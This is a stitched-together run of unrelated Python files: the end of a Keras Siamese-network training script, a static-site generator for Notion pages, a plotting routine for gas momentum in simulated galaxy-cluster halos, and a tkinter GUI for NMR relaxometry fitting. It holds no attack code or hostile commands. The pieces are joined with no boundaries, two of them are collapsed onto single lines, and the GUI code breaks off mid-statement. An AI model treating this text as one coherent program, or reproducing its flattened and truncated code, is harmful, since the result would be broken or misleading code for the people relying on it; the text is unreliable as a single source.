[[x[f21][l31], x[f22][l32]]] labels += [1, 0] return np.array(pairs), np.array(labels) X,y = loadimgs('Training_Folder') digit_indices = [np.where(y == i)[0] for i in range(23)] tr_pairs,tr_y = create_pairs(X,digit_indices) print(tr_y.dtype) print(tr_y.shape) print(tr_y) print(tr_pairs[:,0][0]) input_shape = (53,121,3) model = SiameseNetwork(input_shape) filepath = "/home/hemanth12/Paper/Networks/Siamese/Models/simaese-{epoch:02d}-{val_acc:.2f}.h5" checkpoint = ModelCheckpoint(filepath, monitor='loss', verbose=1, save_best_only=False, 
mode='max') rms = RMSprop() print(model.summary()) model.compile(loss='mse', optimizer=rms, metrics=['accuracy']) history = model.fit([tr_pairs[:, 0], tr_pairs[:, 1]], tr_y.astype('float32'), batch_size=32, epochs=30, validation_split = 0.1,callbacks = [checkpoint]) # Plot training & validation accuracy values plt.plot(history.history['acc']) plt.plot(history.history['val_acc']) plt.title('Model accuracy') plt.ylabel('Accuracy') plt.xlabel('Epoch') plt.legend(['Train', 'Test'], loc='upper left') plt.show() # Plot training & validation loss values plt.plot(history.history['loss']) plt.plot(history.history['val_loss']) plt.title('Model loss') plt.ylabel('Loss') plt.xlabel('Epoch') plt.legend(['Train', 'Test'], loc='upper left') plt.show()
import sass
import markdown
import shutil
import jinja2
from pathlib import Path
import logging
import dateutil.parser as dt_parser
from urllib.parse import urljoin

# pip install mdx_truly_sane_lists
# required pip install markdown-captions, pip install markdown-checklist
# pip install pymdown-extensions


def verify_templates(config: dict):
    """Verifies existense and content of sass and templates dirs."""
    if Path(config["sass_dir"]).is_dir() and any(Path(config["sass_dir"]).iterdir()):
        logging.debug("🤖 Sass directory is OK")
    else:
        logging.critical("🤖 Sass directory is not found or empty.")
    if (Path(config["templates_dir"]).is_dir()
            and any(Path(config["templates_dir"]).iterdir())):
        logging.debug("🤖 Templates directory is OK")
    else:
        logging.critical("🤖 Templates directory is not found or empty.")


def generate_css(config: dict):
    """Generates css file (compiling sass files in the output_dir folder)."""
    sass.compile(dirname=(config["sass_dir"], Path(config["output_dir"]) / 'css'))


def generate_404(structured_notion: dict, config: dict):
    """Generates 404 html page."""
    with open(Path(config["output_dir"]) / '404.html', 'w+',
              encoding='utf-8') as f:
        tml = (Path(config["templates_dir"]) / '404.html').read_text()
        jinja_loader = jinja2.FileSystemLoader(config["templates_dir"])
        jtml = jinja2.Environment(loader=jinja_loader).from_string(tml)
        html_page = jtml.render(content='', site=structured_notion)
        f.write(html_page)


def generate_archive(structured_notion: dict, config: dict):
    """Generates archive page.

    The archive URL is absolute on disk when building locally, otherwise
    it is joined onto the site's base URL.
    """
    if config["build_locally"]:
        archive_link = 'Archive.html'
        structured_notion['archive_url'] = str((Path(config["output_dir"]).resolve()
                                                / archive_link))
    else:
        archive_link = 'Archive/index.html'
        structured_notion['archive_url'] = urljoin(structured_notion['base_url'],
                                                   archive_link)
        (Path(config["output_dir"]) / "Archive").mkdir(exist_ok=True)

    with open(Path(config["output_dir"]) / archive_link, 'w+',
              encoding='utf-8') as f:
        # Specify template folder
        tml = (Path(config["templates_dir"]) / 'archive.html').read_text()
        jinja_loader = jinja2.FileSystemLoader(config["templates_dir"])
        jtemplate = jinja2.Environment(loader=jinja_loader).from_string(tml)
        html_page = jtemplate.render(content='', site=structured_notion)
        f.write(html_page)


def str_to_dt(structured_notion: dict):
    """Parses the ISO date strings of every page into datetime objects, in place."""
    for page_id, page in structured_notion["pages"].items():
        for field in ['date', 'date_end', 'last_edited_time']:
            if field in page.keys():
                structured_notion["pages"][page_id][field] = dt_parser.isoparse(page[field])


def generate_page(page_id: str, structured_notion: dict, config: dict):
    """Renders one page: writes its markdown source and the jinja-templated HTML."""
    page = structured_notion["pages"][page_id]
    page_url = page["url"]
    md_filename = page["title"] + '.md'
    if config["build_locally"]:
        folder = urljoin(page_url, '.')
        local_file_location = str(Path(folder).relative_to(Path(config["output_dir"]).resolve()))
        html_filename = Path(page_url).name
    else:
        # BUG FIX: str.lstrip strips a *character set*, not a prefix — it could
        # also eat leading characters of the path itself. Remove the site URL
        # prefix explicitly instead.
        site_url = config["site_url"]
        if page_url.startswith(site_url):
            local_file_location = page_url[len(site_url):]
        else:
            local_file_location = page_url
        html_filename = 'index.html'
    logging.debug(f"🤖 MD {Path(local_file_location) / md_filename}; HTML {Path(local_file_location) / html_filename}")

    (config["output_dir"] / Path(local_file_location)).mkdir(parents=True,
                                                             exist_ok=True)
    with open((config["output_dir"] / Path(local_file_location) / md_filename).resolve(),
              'w+', encoding='utf-8') as f:
        # Front-matter metadata block prepended to the markdown source.
        metadata = ("---\n"
                    f"title: {page['title']}\n"
                    f"cover: {page['cover']}\n"
                    f"icon: {page['icon']}\n"
                    f"emoji: {page['emoji']}\n")
        if "properties_md" in page.keys():
            for p_title, p_md in page["properties_md"].items():
                metadata += f"{p_title}: {p_md}\n"
        metadata += f"---\n\n"
        ### Complex part here
        md_content = page['md_content']
        md_content = metadata + md_content
        f.write(md_content)

    html_content = markdown.markdown(md_content,
                                     extensions=["meta",
                                                 "tables",
                                                 "mdx_truly_sane_lists",
                                                 "markdown_checklist.extension",
                                                 "markdown_captions",
                                                 "pymdownx.tilde",
                                                 "pymdownx.superfences"],
                                     extension_configs={
                                         'mdx_truly_sane_lists': {
                                             'nested_indent': 4,
                                             'truly_sane': True,
                                         }})

    tml = (Path(config["templates_dir"]) / 'page.html').read_text()
    with open((config["output_dir"] / Path(local_file_location) / html_filename).resolve(),
              'w+', encoding='utf-8') as f:
        # Specify template folder
        jinja_loader = jinja2.FileSystemLoader(config["templates_dir"])
        jtemplate = jinja2.Environment(loader=jinja_loader).from_string(tml)
        html_page = jtemplate.render(content=html_content, page=page,
                                     site=structured_notion)
        f.write(html_page)


def generate_pages(structured_notion: dict, config: dict):
    """Renders every page of the site."""
    for page_id, page in structured_notion["pages"].items():
        generate_page(page_id, structured_notion, config)


def generate_site(structured_notion: dict, config: dict):
    """Full build: verify inputs, compile CSS, copy fonts, then render all pages."""
    verify_templates(config)
    logging.debug("🤖 SASS and templates are verified.")
    generate_css(config)
    logging.debug("🤖 SASS translated to CSS folder.")
    if (Path(config["output_dir"]) / "css" / "fonts").exists():
        # copytree (pre-3.8 behavior) fails on an existing target; clear it first.
        shutil.rmtree(Path(config["output_dir"]) / "css" / "fonts")
    shutil.copytree(Path(config["sass_dir"]) / "fonts",
                    Path(config["output_dir"]) / "css" / "fonts")
    logging.debug("🤖 Copied fonts.")
    str_to_dt(structured_notion)
    logging.debug("🤖 Changed string in dates to datetime objects.")
    generate_archive(structured_notion, config)
    logging.info("🤖 Archive page generated.")
    generate_404(structured_notion, config)
    logging.info("🤖 404.html page generated.")
    generate_pages(structured_notion, config)
    logging.info("🤖 All html and md pages generated.")
# obsolete/map_momentum.py
import clusters_retriever as extract
from visualisation import map_plot_parameters as plotpar
import cluster_profiler as profile
from obsolete import map_synthetizer as mapgen
import numpy as np
from matplotlib import pyplot as plt
from mpl_toolkits.axes_grid1.axes_divider import make_axes_locatable
from matplotlib.patches import Circle
from os import makedirs
from os.path import exists


def map_weighted_velocity(num_halo, redshift, simulation_type = 'gas', output = 'show',
                          title = True, save_name = 'Map_particles_gas',
                          plot_groups = 'FoF', nbins = 400):
    """Plot three projected, mass-weighted line-of-sight momentum maps
    (xy, yz, xz) of the gas particles of one halo.

    Parameters
    ----------
    num_halo : halo index in the simulation catalogue
    redshift : snapshot redshift
    simulation_type : particle data flavour passed to the extractor (default 'gas')
    output : 'show' to display, 'save' to write a pdf
    title : whether to draw a per-panel title
    save_name : filename stem used when output == 'save'
    plot_groups : 'FoF' for all group particles, 'subgroups' for bound substructure
    nbins : number of bins per axis of each 2D histogram
    """
    # Import data
    path = extract.path_from_cluster_name(num_halo, simulation_type = simulation_type)
    file = extract.file_name_hdf5(subject = 'groups',
                                  redshift = extract.redshift_floatTostr(redshift))
    r200 = extract.group_r200(path, file)
    group_CoP = extract.group_centre_of_potential(path, file)
    file = extract.file_name_hdf5(subject = 'particledata',
                                  redshift = extract.redshift_floatTostr(redshift))

    # Gas particles
    part_type = extract.particle_type('gas')
    mass = extract.particle_masses(path, file, part_type)
    coordinates = extract.particle_coordinates(path, file, part_type)
    velocities = extract.particle_velocity(path, file, part_type)
    group_number = extract.group_number(path, file, part_type)
    subgroup_number = extract.subgroup_number(path, file, part_type)
    tot_rest_frame, _ = profile.total_mass_rest_frame(path, file)
    #gas_rest_frame, _ = profile.cluster_average_momentum(path, file, part_type)
    h = extract.file_hubble_param(path, file)

    # Retrieve coordinates & velocities relative to the centre of potential
    # and the cluster rest frame.
    x = coordinates[:,0] - group_CoP[0]
    y = coordinates[:,1] - group_CoP[1]
    z = coordinates[:,2] - group_CoP[2]
    vx = velocities[:,0] - tot_rest_frame[0]
    vy = velocities[:,1] - tot_rest_frame[1]
    vz = velocities[:,2] - tot_rest_frame[2]

    # Rescale to comoving coordinates
    x = profile.comoving_length(x, h, redshift)
    y = profile.comoving_length(y, h, redshift)
    z = profile.comoving_length(z, h, redshift)
    r200 = profile.comoving_length(r200, h, redshift)
    vx = profile.comoving_velocity(vx, h, redshift)
    vy = profile.comoving_velocity(vy, h, redshift)
    vz = profile.comoving_velocity(vz, h, redshift)
    vx = profile.velocity_units(vx, unit_system = 'astro')
    vy = profile.velocity_units(vy, unit_system = 'astro')
    vz = profile.velocity_units(vz, unit_system = 'astro')
    mass = profile.comoving_mass(mass, h, redshift)
    mass = profile.mass_units(mass, unit_system = 'astro')

    # Compute radial distance
    r = np.sqrt(x**2+y**2+z**2)

    # Select particles within 5*r200
    if plot_groups == 'FoF':
        index = np.where((r < 5*r200) & (group_number > -1) & (subgroup_number > -1))[0]
    elif plot_groups == 'subgroups':
        index = np.where((r < 5*r200) & (group_number > -1) & (subgroup_number > 0))[0]
    else:
        print("[ERROR] The (sub)groups you are trying to plot are not defined.")
        exit(1)

    mass = mass[index]
    x, y, z = x[index], y[index], z[index]
    vx, vy, vz = vx[index], vy[index], vz[index]

    # Generate plot
    plotpar.set_defaults_plot()
    fig, axes = plt.subplots(nrows=1, ncols=3, figsize=(20, 7))

    # Bin data
    #nbins = 800
    cmap = mapgen.modified_spectral_cmap(Reversed = True)
    xlabel = [r'$x\mathrm{/Mpc}$', r'$y\mathrm{/Mpc}$', r'$x\mathrm{/Mpc}$']
    ylabel = [r'$y\mathrm{/Mpc}$', r'$z\mathrm{/Mpc}$', r'$z\mathrm{/Mpc}$']
    thirdAX = [r'$\bigotimes z$', r'$\bigotimes x$', r'$\bigodot y$']
    cbarlabel = [r'$\sum_{i} m_i v_{z, i}\ [\mathrm{M_\odot\ km\ s^{-1}}]$',
                 r'$\sum_{i} m_i v_{x, i}\ [\mathrm{M_\odot\ km\ s^{-1}}]$',
                 r'$\sum_{i} m_i v_{y, i}\ [\mathrm{M_\odot\ km\ s^{-1}}]$']

    for i in [0,1,2]:
        # Handle data: each panel projects onto a different plane and weights
        # by the component of velocity along the remaining (line-of-sight) axis.
        if i == 0:
            x_Data = x
            y_Data = y
            weight = vz
        elif i == 1:
            x_Data = y
            y_Data = z
            weight = vx
        elif i == 2:
            x_Data = x
            y_Data = z
            weight = vy
            cmap = mapgen.modified_spectral_cmap(Reversed = False)

        x_bins = np.linspace(np.min(x_Data), np.max(x_Data), nbins)
        y_bins = np.linspace(np.min(y_Data), np.max(y_Data), nbins)
        Cx, Cy = mapgen.bins_meshify(x_Data, y_Data, x_bins, y_bins)
        # line of sight momentum weights
        count = mapgen.bins_evaluate(x_Data, y_Data, x_bins, y_bins,
                                     weights = mass*weight)

        # Diverging normalisation centred on zero momentum.
        norm = mapgen.MidpointNormalize(vmin=count.min(), vmax=count.max(), midpoint=0)
        img = axes[i].pcolor(Cx, Cy, count, cmap=cmap, norm= norm)

        # Render elements in plots
        axes[i].set_aspect('equal')
        axes[i].add_artist(Circle((0,0), radius=r200, color = 'black',
                                  fill = False, linestyle = '--',
                                  label = r'$R_{200}$'))
        axes[i].add_artist(Circle((0,0), radius=5*r200, color = 'black',
                                  fill = False, linewidth = 0.5,
                                  linestyle = '-', label = r'$R_{200}$'))
        axes[i].set_xlim(-5.1*r200, 5.1*r200)
        axes[i].set_ylim(-5.1*r200, 5.1*r200)
        axes[i].set_xlabel(xlabel[i])
        axes[i].set_ylabel(ylabel[i])
        axes[i].annotate(thirdAX[i], (0.03, 0.03), textcoords='axes fraction',
                         size = 15)
        if title:
            axes[i].set_title(r'$\mathrm{MACSIS\ halo\ } %3d \qquad z = %8.3f$'
                              % (num_halo, redshift))

        # Colorbar adjustments
        ax2_divider = make_axes_locatable(axes[i])
        cax2 = ax2_divider.append_axes("right", size="3%", pad="2%")
        cbar = plt.colorbar(img, cax=cax2, orientation='vertical')
        cbar.set_label(cbarlabel[i], labelpad=17)
        #cax2.xaxis.set_tick_labels(['0',' ','0.5',' ','1',' ', '1.5',' ','2'])
        cax2.xaxis.set_ticks_position("top")

    # Define output
    if output == 'show':
        plt.show()
    elif output == 'save':
        dir_name = 'Map mass weighted velocity'
        if not exists(dir_name):
            makedirs(dir_name)
        plt.savefig(dir_name + '//'+save_name+'_partType'+part_type+'_halo'+str(num_halo)+'z'+str(redshift).replace(".", "")+'.pdf')
    else:
        print("[ERROR] The output type you are trying to select is not defined.")
        exit(1)


# ***********************************
# DERIVED METHODS

def map_weighted_velocity_FoF(num_halo, redshift, simulation_type = 'gas',
                              output = 'show', title = True,
                              save_name = 'Map_momentum', nbins = 400):
    """Momentum map of all FoF-group particles of one halo."""
    # BUG FIX: simulation_type is now forwarded (it was previously accepted
    # but silently dropped, so the default was always used).
    map_weighted_velocity(num_halo, redshift, simulation_type = simulation_type,
                          output = output, title = title, save_name = save_name,
                          plot_groups = 'FoF', nbins = nbins)


def map_weighted_velocity_subgroups(num_halo, redshift, simulation_type = 'gas',
                                    output = 'show', title = True,
                                    save_name = 'Map_momentum', nbins = 400):
    """Momentum map of the bound substructure particles of one halo."""
    # BUG FIX: simulation_type is now forwarded (see map_weighted_velocity_FoF).
    map_weighted_velocity(num_halo, redshift, simulation_type = simulation_type,
                          output = output, title = title, save_name = save_name,
                          plot_groups = 'subgroups', nbins = nbins)


# ***********************************
# Example of implementation
# ***********************************

# Specify object
simulation_type = 'gas'
redshift = 0.57

for num_halo in range(0,1):
    print('\nExamining halo\t', num_halo)
    #map_weighted_velocity_subgroups(num_halo, redshift, simulation_type = simulation_type, output = 'save', title = True, save_name = 'Map_mass-w_velocity_subgroups_')


#from pdf_graph_merger import merge_pdf
#chdir('Map mass weighted velocity')
#merge_pdf('Map_mass-w_velocity_', out_filename = 'Map_mass-w_velocity_')

print(' - - - - - - - - - \nEnd of file.')
<gh_stars>0 #!/usr/bin/env python3 # -*- coding: utf-8 -*- import tkinter as tk from tkinter.filedialog import askopenfilename, askdirectory from PIL import ImageTk, Image from shutil import copyfile from distutils.dir_util import copy_tree from scipy.optimize import curve_fit from random import uniform from scipy import linalg import numpy as np import time import sys import os CSFolder = str(sys.argv[1]) RatesFolder = CSFolder + "/Rates" sys.path.append(os.path.abspath(CSFolder)) sys.path.append(os.path.abspath(RatesFolder)) import Parameters as ParamFile import _RelaxMat sys.path.append(os.path.abspath('lib')) import FitFunctions as FitF import ShuttlingSimulation as ShSim import Outputs as Out import FigOutputs as FigOut import MonteCarlo as MCMC #################################################### Graphical User Interface #################################################### class GUI(tk.Frame): def __init__(self, parent): tk.Frame.__init__(self, parent) self.parent = parent self.RelaxFunc = ParamFile.ImportFunc() self.RATES = [] self.parameters() ############ Main window def parameters(self): def Quit(self): sys.exit(0) def SaveParam(self): CurrentDir = os.path.dirname(os.path.abspath(__file__)) Out.WritePreSavedParam(self, CurrentDir) #Browsing functions def BrowseFieldCal(self): self.FieldCalibration = askopenfilename() self.FieldCal.config(text=os.path.basename(self.FieldCalibration)) def BrowseExpSetUp(self): self.ExperimentalSetUp = askopenfilename() self.ExpSetUp.config(text=os.path.basename(self.ExperimentalSetUp)) def BrowseRelaxomInt(self): self.Intrelax = askdirectory() self.Irelaxom.config(text=os.path.basename(self.Intrelax)) def BrowseInputs(self): self.InputFile = askopenfilename() self.Input.config(text=os.path.basename(self.InputFile)) def BrowseRates(self, n): n = n[0] if n+1 > len(self.RATES): self.RATES.append(askopenfilename()) else: self.RATES[n] = askopenfilename() self.RelaxationDataSet[n].config(text=os.path.basename(self.RATES[n])) if 
len(self.RelaxationDataSet) % 2 == 0: self.AddButton.grid(row=int(self.nline+3+len(self.RelaxationDataSet)/2), column=8) else: self.AddButton.grid(row=int(self.nline+3+(1+len(self.RelaxationDataSet))/2), column=4, columnspan=2) def Add(self): N = ([self.Nlabel]) self.Nlabel += 1 self.AddButton.grid_forget() self.RelaxationDataSet.append(tk.Button(self.param, text="High field rates", command = lambda: BrowseRates(self, N))) self.RelaxationDataType.append(tk.StringVar()) self.RelaxationDataType[-1].set("Data Type") self.RelaxationType.append(tk.OptionMenu(self.param, self.RelaxationDataType[-1], *self.MenuRelaxType.keys())) Field = tk.StringVar() Field.set("High field (T)") self.Fields.append(tk.Entry(self.param, textvariable = Field, width=10)) if len(self.RelaxationDataSet) % 2 == 0: self.RelaxationDataSet[-1].grid(row=int(self.nline+3+len(self.RelaxationDataSet)/2), column=4, columnspan=2) self.RelaxationType[-1].grid(row=int(self.nline+3+len(self.RelaxationDataSet)/2), column=6) self.Fields[-1].grid(row=int(self.nline+3+len(self.RelaxationDataSet)/2), column=7) else: self.RelaxationDataSet[-1].grid(row=int(self.nline+3+(1+len(self.RelaxationDataSet))/2), column=0, columnspan=2) self.RelaxationType[-1].grid(row=int(self.nline+3+(1+len(self.RelaxationDataSet))/2), column=2) self.Fields[-1].grid(row=int(self.nline+3+(1+len(self.RelaxationDataSet))/2), column=3) #function to load previous parameters def LoadParam(self): root.withdraw() self.parameters = askopenfilename() paramFile = open(self.parameters, 'r') nparam = sum(1 for line in paramFile)-1 paramFile.close() paramFile = open(self.parameters, 'r') paramFile.readline() previousSetUp = [] for i in range(nparam): Line = paramFile.readline() Line = [x for x in Line.split('\n')] Line = Line[0] Line = [x for x in Line.split('\t')] previousSetUp.append(Line) self.TAUC.set(previousSetUp[0][1]) self.AccelerationTYPE.set(previousSetUp[1][1]) self.NWALKER.set(previousSetUp[2][1]) self.NMCMC.set(previousSetUp[3][1]) if 
previousSetUp[4][1] != 'Not available': self.PDBID.set(previousSetUp[4][1]) if os.path.exists(previousSetUp[5][1]): self.ExperimentalSetUp = previousSetUp[5][1] self.ExpSetUp.config(text=os.path.basename(self.ExperimentalSetUp)) else: self.ErrorText = tk.Label(self.param, text = "Status: Missing file(s)", fg="orange") self.ErrorText.grid(row=0, column=3) if os.path.exists(previousSetUp[6][1]): self.FieldCalibration = previousSetUp[6][1] self.FieldCal.config(text=os.path.basename(self.FieldCalibration)) else: self.ErrorText = tk.Label(self.param, text = "Status: Missing file(s)", fg="orange") self.ErrorText.grid(row=0, column=3) if os.path.exists(previousSetUp[7][1]): self.Intrelax = previousSetUp[7][1] self.Irelaxom.config(text=os.path.basename(self.Intrelax)) else: self.ErrorText = tk.Label(self.param, text = "Status: Missing file(s)", fg="orange") self.ErrorText.grid(row=0, column=3) if os.path.exists(previousSetUp[8][1]): self.InputFile = previousSetUp[8][1] self.Input.config(text=os.path.basename(self.InputFile)) else: self.ErrorText = tk.Label(self.param, text = "Status: Missing file(s)", fg="orange") self.ErrorText.grid(row=0, column=3) if len(previousSetUp[9]) == 3*len(self.mins2)+1: for i in range(len(self.mins2)): self.mins2[i].set(previousSetUp[9][3*i+1]) self.maxs2[i].set(previousSetUp[9][3*i+2]) if len(previousSetUp[10]) == 3*len(self.mintau)+1: for i in range(len(self.mintau)): self.mintau[i].set(previousSetUp[10][3*i+1]) self.maxtau[i].set(previousSetUp[10][3*i+2]) if len(previousSetUp[11]) == 3*len(self.minOthers)+1: for i in range(len(self.minOthers)): self.minOthers[i].set(previousSetUp[11][3*i+1]) self.maxOthers[i].set(previousSetUp[11][3*i+2]) self.AddButton.grid_forget() for i in range(len(self.RelaxationDataSet)): self.RelaxationDataSet[i].grid_forget() self.RelaxationType[i].grid_forget() self.Fields[i].grid_forget() self.RATES = [] self.RelaxationDataSet = [] self.RelaxationDataType = [] self.RelaxationType = [] self.Fields = [] self.Nlabel = 
0 for i in range(12, nparam): if os.path.exists(previousSetUp[i][1]): Add(self) self.RelaxationDataSet[-1].config(text=os.path.basename(previousSetUp[i][1])) self.RATES.append(previousSetUp[i][1]) self.RelaxationDataType[-1].set(previousSetUp[i][2]) self.Fields[-1].delete(0, "end") self.Fields[-1].insert(0, previousSetUp[i][3]) if len(self.RelaxationDataSet) % 2 == 0: self.RelaxationDataSet[-1].grid(row=int(self.nline+3+len(self.RelaxationDataSet)/2), column=4, columnspan=2) self.RelaxationType[-1].grid(row=int(self.nline+3+len(self.RelaxationDataSet)/2), column=6) self.Fields[-1].grid(row=int(self.nline+3+len(self.RelaxationDataSet)/2), column=7) else: self.RelaxationDataSet[-1].grid(row=int(self.nline+3+(1+len(self.RelaxationDataSet))/2), column=0, columnspan=2) self.RelaxationType[-1].grid(row=int(self.nline+3+(1+len(self.RelaxationDataSet))/2), column=2) self.Fields[-1].grid(row=int(self.nline+3+(1+len(self.RelaxationDataSet))/2), column=3) else: self.ErrorText = tk.Label(self.param, text = "Status: Missing file(s)", fg="orange") self.ErrorText.grid(row=0, column=3) if len(self.RelaxationDataSet) % 2 == 0: self.AddButton.grid(row=int(self.nline+3+len(self.RelaxationDataSet)/2), column=8, columnspan=2) else: self.AddButton.grid(row=int(self.nline+3+(1+len(self.RelaxationDataSet))/2), column=4, columnspan=2) ############# GUI coding self.param = tk.Toplevel() self.param.title("MINOTAUR") self.param.geometry("1300x800") self.grid(row=0, column=0) self.img = ImageTk.PhotoImage(Image.open("lib/Logo.jpg")) panel = tk.Label(self.param, image=self.img) panel.grid(row=0, column=2, columnspan=3, rowspan=2) #Button part self.quitButton = tk.Button(self.param, text="Quit", command = lambda: Quit(self)) self.startButton = tk.Button(self.param, text="Start", bg="green", command=self.GetData) self.quitButton.grid(row=0, column=6) self.startButton.grid(row=0, column=7) self.Load = tk.Button(self.param, text="Load previous parameters", command = lambda: LoadParam(self)) 
self.Load.grid(row=0, column=0, columnspan=3) self.Save = tk.Button(self.param, text="Save current parameters", command = lambda: SaveParam(self)) self.Save.grid(row=1, column=6, columnspan=2) #Fitting parameters part ParamText = tk.Label(self.param, text="Set fitting parameters:", fg="blue") self.TAUC = tk.IntVar() self.TAUC.set("Correlation time TauC (sec)") self.TauC = tk.Entry(self.param, textvariable = self.TAUC) self.AccelerationTYPE = tk.StringVar() self.AccelerationTYPE.set("Type of shuttling") AccelerationType = tk.OptionMenu(self.param, self.AccelerationTYPE, "Constant Speed", "Constant Acceleration") self.NMCMC= tk.IntVar() self.NMCMC.set("MCMC - Number of steps") self.Nmcmc = tk.Entry(self.param, textvariable = self.NMCMC, width=25) self.NWALKER = tk.IntVar() self.NWALKER.set("MCMC - Number of chains") self.Nwalker = tk.Entry(self.param, textvariable = self.NWALKER, width=25) ParamText.grid(row=1, column=0) self.TauC.grid(row=2, column=0, columnspan=3) AccelerationType.grid(row=2, column=3, columnspan=2) self.Nwalker.grid(row=3, column=5, columnspan=3) self.Nmcmc.grid(row=2, column=5, columnspan=3) #Limits Part LimitText = tk.Label(self.param, text="Set Limits for MCMC initial guess:", fg="blue") MinS2Text = tk.Label(self.param, text="Min") MaxS2Text = tk.Label(self.param, text="Max") MinTauText = tk.Label(self.param, text="Min") MaxTauText = tk.Label(self.param, text="Max") MinOtherText = tk.Label(self.param, text="Min") MaxOtherText = tk.Label(self.param, text="Max") LimitText.grid(row=5, column=0) MinS2Text.grid(row=6, column=1) MaxS2Text.grid(row=6, column=2) MinTauText.grid(row=6, column=4) MaxTauText.grid(row=6, column=5) MinOtherText.grid(row=6, column=7) MaxOtherText.grid(row=6, column=8) self.OP = ParamFile.Names['OrderParam'] self.MinS2 = [] self.MaxS2 = [] self.mins2 = [] self.maxs2 = [] for i in range(len(self.OP)): s2Text = tk.Label(self.param, text=self.OP[i]) self.mins2.append(tk.IntVar()) self.mins2[-1].set("0.0") 
self.MinS2.append(tk.Entry(self.param, textvariable = self.mins2[-1], width=10)) self.maxs2.append(tk.IntVar()) self.maxs2[-1].set("1.0") self.MaxS2.append(tk.Entry(self.param, textvariable = self.maxs2[-1], width=10)) s2Text.grid(row=7+i, column=0) self.MinS2[i].grid(row=7+i, column=1) self.MaxS2[i].grid(row=7+i, column=2) self.CT = ParamFile.Names['CorrTimes'] self.MinTau = [] self.MaxTau = [] self.mintau = [] self.maxtau = [] for i in range(len(self.CT)): tauText = tk.Label(self.param, text=self.CT[i]) self.mintau.append(tk.IntVar()) self.mintau[-1].set("") self.MinTau.append(tk.Entry(self.param, textvariable = self.mintau[-1], width=10)) self.maxtau.append(tk.IntVar()) self.maxtau[-1].set("") self.MaxTau.append(tk.Entry(self.param, textvariable = self.maxtau[-1], width=10)) tauText.grid(row=7+i, column=3) self.MinTau[i].grid(row=7+i, column=4) self.MaxTau[i].grid(row=7+i, column=5) self.Others = ParamFile.Names['others'] self.MinOthers = [] self.MaxOthers = [] self.minOthers = [] self.maxOthers = [] for i in range(len(self.Others)): OthersText = tk.Label(self.param, text=self.Others[i]) self.minOthers.append(tk.IntVar()) self.minOthers[-1].set("") self.MinOthers.append(tk.Entry(self.param, textvariable = self.minOthers[-1], width=10)) self.maxOthers.append(tk.IntVar()) self.maxOthers[-1].set("") self.MaxOthers.append(tk.Entry(self.param, textvariable = self.maxOthers[-1], width=10)) OthersText.grid(row=7+i, column=6) self.MinOthers[i].grid(row=7+i, column=7) self.MaxOthers[i].grid(row=7+i, column=8) incr = max(len(self.OP), len(self.CT), len(self.Others)) self.nline = 6 + incr #Load files part TextFiles = tk.Label(self.param, text = "Load files:", fg="blue") self.FieldCal = tk.Button(self.param, text="Field calibration file", command = lambda: BrowseFieldCal(self)) self.ExpSetUp = tk.Button(self.param, text="Experimental setup file", command = lambda: BrowseExpSetUp(self)) self.Irelaxom = tk.Button(self.param, text="Relaxometry Intensity folder", command = 
lambda: BrowseRelaxomInt(self)) self.Input = tk.Button(self.param, text="Other inputs file", command = lambda: BrowseInputs(self)) self.RelaxationDataSet = [] self.Nlabel = 1 self.RelaxationDataSet.append(tk.Button(self.param, text="High field rates", command = lambda: BrowseRates(self, ([0])))) self.MenuRelaxType = {} for i in range(len(ParamFile.RelaxationRates)): self.MenuRelaxType[str(ParamFile.RelaxationRates[i])] = i+1 self.RelaxationDataType = [] self.RelaxationType = [] self.RelaxationDataType.append(tk.StringVar()) self.RelaxationDataType[-1].set("Data type") self.RelaxationType.append(tk.OptionMenu(self.param, self.RelaxationDataType[-1], *self.MenuRelaxType.keys())) self.Fields = [] Field = tk.StringVar() Field.set("High field (T)") self.Fields.append(tk.Entry(self.param, textvariable = Field, width=10)) self.AddButton = tk.Button(self.param, text="Add high field rates", command = lambda: Add(self)) TextFiles.grid(row=self.nline+1, column=0) self.FieldCal.grid(row=self.nline+2, column=0, columnspan=2) self.ExpSetUp.grid(row=self.nline+2, column=2) self.Irelaxom.grid(row=self.nline+3, column=0, columnspan=2) self.Input.grid(row=self.nline+3, column=2) for i in range(len(self.RelaxationDataSet)): self.RelaxationDataSet[i].grid(row=self.nline+4+i, column=0, columnspan=2) self.RelaxationType[i].grid(row=self.nline+4+i, column=2) self.Fields[i].grid(row=self.nline+4+i, column=3) #PDB ID TextPDB = tk.Label(self.param, text = "4-letter PDB ID (if available):", fg = "blue") self.PDBID = tk.IntVar() self.PDBID.set("") self.PDBid = tk.Entry(self.param, textvariable = self.PDBID, width=10) TextPDB.grid(row=self.nline+1, column=6, columnspan=2) self.PDBid.grid(row=self.nline+2, column=6, columnspan=2) def GetData(self): GUI.begin = time.strftime("%H") + "H" + time.strftime("%M") #################################################### Create the results folder and copy the input files in it #################################################### workingDirectiory = 
os.path.dirname(os.path.abspath(__file__)) ResultDirectory = workingDirectiory + "/Results" if not os.path.exists(ResultDirectory): os.makedirs(ResultDirectory) GUI.directoryName = ResultDirectory + "/" + time.strftime("%Y-%m-%d") t = 0 n = 2 while t == 0: if not os.path.exists(GUI.directoryName): os.makedirs(GUI.directoryName) t = 1 else: GUI.directoryName = ResultDirectory + "/" + time.strftime("%Y-%m-%d") + "_" + str(n) n += 1 dirInput = GUI.directoryName + "/InputFiles" os.makedirs(dirInput) dirOutput = GUI.directoryName + "/FitAllResidues" os.makedirs(dirOutput) dirFitOutput = GUI.directoryName + "/FittingResults" os.makedirs(dirFitOutput) #Copy the directory functions fromDirectory = sys.argv[1] toDirectory = dirInput + "/ExpressionsAndConstraints" os.makedirs(toDirectory) copy_tree(fromDirectory, toDirectory) #Copy the input files ExperimentalSetUpPath = self.ExperimentalSetUp FieldCalibrationPath = self.FieldCalibration GUI.InputPath = self.InputFile dirHFRelax = dirInput + "/HFRelaxationRates" os.makedirs(dirHFRelax) for i in range(len(ParamFile.RelaxationRates)): os.makedirs(dirHFRelax + "/" + ParamFile.RelaxationRates[i]) os.makedirs(dirOutput + "/" + ParamFile.RelaxationRates[i]) for i in range(len(self.RATES)): RelaxFilePath = self.RATES[i] destFile = dirHFRelax + "/" + str(self.RelaxationDataType[i].get()) + "/" + str(os.path.basename(self.RATES[i])) copyfile(RelaxFilePath, destFile) FileNames = ["/ExpSetUp.txt", "/FieldCalibration.txt", "/OtherInputs.txt"] n = 0 for i in [ExperimentalSetUpPath, FieldCalibrationPath, GUI.InputPath]: destFile = dirInput + FileNames[n] copyfile(i, destFile) n+=1 #################################################### Read the data #################################################### GUI.Nmcmc = int(self.Nmcmc.get()) Nwalker_b = int(self.Nwalker.get()) GUI.Nwalker = 